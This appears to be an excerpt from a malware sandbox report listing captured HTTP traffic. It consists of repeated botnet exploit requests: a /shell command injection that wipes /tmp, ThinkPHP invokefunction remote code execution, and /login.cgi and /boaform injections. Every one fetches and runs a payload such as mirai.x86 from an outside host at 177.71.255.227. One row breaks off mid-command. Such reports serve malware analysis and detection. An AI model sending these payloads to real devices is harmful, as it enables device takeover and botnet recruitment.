| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Edit tour
